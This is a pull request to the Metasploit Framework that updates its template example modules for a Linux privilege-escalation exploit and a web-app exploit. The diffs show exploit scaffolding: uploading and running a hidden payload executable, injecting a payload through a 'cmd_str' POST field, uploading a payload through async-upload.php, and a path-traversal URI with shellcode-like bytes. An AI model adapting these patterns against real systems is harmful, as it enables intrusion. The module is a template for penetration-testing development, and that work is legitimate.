### PR TITLE
Small Updates to Example Modules

### DIFF
--- a/modules/exploits/example_linux_priv_esc.rb
+++ b/modules/exploits/example_linux_priv_esc.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'http://www.example.com'],
           [ 'CVE', '1978-1234']
         ],
-        'DisclosureDate' => '2019-11-29',
+        'DisclosureDate' => '2023-11-29',
         # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
         # It's generally easiest just to put the default at the beginning of the list and skip this
         # entirely.
@@ -100,18 +100,16 @@ class MetasploitModule < Msf::Exploit::Local
     release = kernel_release
     if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
        Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
-      vprint_error "Kernel version #{release} is not vulnerable"
-      return CheckCode::Safe
+      return CheckCode::Safe("Kernel version #{release} is not vulnerable")
     end
     vprint_good "Kernel version #{release} appears to be vulnerable"
 
     # Check the app is installed and the version, debian based example
     package = cmd_exec('dpkg -l example | grep \'^ii\'')
     if package&.include?('1:2015.3.14AR.1-1build1')
-      print_good("Vulnerable app version #{package} detected")
-      CheckCode::Appears
+      CheckCode::Appears("Vulnerable app version #{package} detected")
     end
-    CheckCode::Safe
+    CheckCode::Safe("app #{package} is not vulnerable")
   end
 
   #
@@ -121,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     # Check if we're already root
     if !datastore['ForceExploit'] && is_root?
-      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
     end
 
     # Make sure we can write our exploit and payload to the local system
@@ -141,9 +139,14 @@ class MetasploitModule < Msf::Exploit::Local
       upload_and_chmodx executable_path, exploit_data('example')
     end
 
+    # register the file for automatic cleanup
+    register_files_for_cleanup(executable_path)
+
     # Upload payload executable
     payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
     upload_and_chmodx payload_path, generate_payload_exe
+    # register payload for automatic cleanup
+    register_files_for_cleanup(payload_path)
 
     # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
     # output from the exploit being run, they can optionally see it

--- a/modules/exploits/example_webapp.rb
+++ b/modules/exploits/example_webapp.rb
@@ -170,7 +170,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # example of sending a MIME message
     data = Rex::MIME::Message.new
     # https://github.com/rapid7/rex-mime/blob/master/lib/rex/mime/message.rb
-    data.add_part("upload-attachment", nil, nil, "form-data; name=\"action\"")
+    file_contents = payload.encoded
+    data.add_part(file_contents, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"uploaded.bin\"")
     data.add_part('example', nil, nil, "form-data; name=\"_wpnonce\"")
 
     post_data = data.to_s

--- a/modules/exploits/example_webapp.rb
+++ b/modules/exploits/example_webapp.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [
           [ 'Automatic Target', {}]
         ],
-        'DisclosureDate' => '2020-12-30',
+        'DisclosureDate' => '2023-12-30',
         # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
         # It's generally easiest just to put the default at the beginning of the list and skip this
         # entirely.
@@ -112,8 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     %r{Version: (?<version>\d{1,2}\.\d{1,2})</td>} =~ res.body
 
     if version && Rex::Version.new(version) <= Rex::Version.new('1.3')
-      vprint_good("Version Detected: #{version}")
-      CheckCode::Appears
+      CheckCode::Appears("Version Detected: #{version}")
     end
 
     CheckCode::Safe
@@ -129,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status('Attempting login')
     # since we will check res to see if auth was a success, make sure to capture the return
     res = send_request_cgi(
-      'uri' => '/login.html',
+      'uri' => normalize_uri(target_uri.path, 'login.php'),
       'method' => 'POST',
       'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
       # automatically handle cookies with keep_cookies.  Alternatively use cookie = res.get_cookies and 'cookie' => cookie,
@@ -154,7 +153,6 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'command.html'),
       'method' => 'POST',
-      'cookie' => cookie,
       'vars_post' =>
       {
         'cmd_str' => payload.encoded
@@ -168,6 +166,22 @@ class MetasploitModule < Msf::Exploit::Remote
       'version' => '1.0',
       'uri' => '/' + ('../' * 560) + "\xcc\xcc\x90\x90" + '.smi'
     }, datastore['HttpClientTimeout'])
+
+    # example of sending a MIME message
+    data = Rex::MIME::Message.new
+    # https://github.com/rapid7/rex-mime/blob/master/lib/rex/mime/message.rb
+    data.add_part("upload-attachment", nil, nil, "form-data; name=\"action\"")
+    data.add_part('example', nil, nil, "form-data; name=\"_wpnonce\"")
+
+    post_data = data.to_s
+
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, 'async-upload.php'),
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => post_data,
+      'cookie'  => cookie
+    )
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end


### PR DESCRIPTION
Just a few small updates to some of the example modules to keep them in line with framework changes.

1. Updated the check codes to return text instead of doing `print_` before them.
2. Added `register_files_for_cleanup` to linux privesc example
3. added MIME example to webapp
4. changed the fail type when root on the priv esc as per https://github.com/rapid7/metasploit-framework/pull/17929#discussion_r1178068467